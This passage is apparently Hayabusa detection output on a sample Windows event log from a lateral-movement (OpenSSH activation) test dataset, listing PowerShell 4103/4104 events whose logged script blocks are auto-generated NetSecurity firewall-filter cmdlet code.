NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = 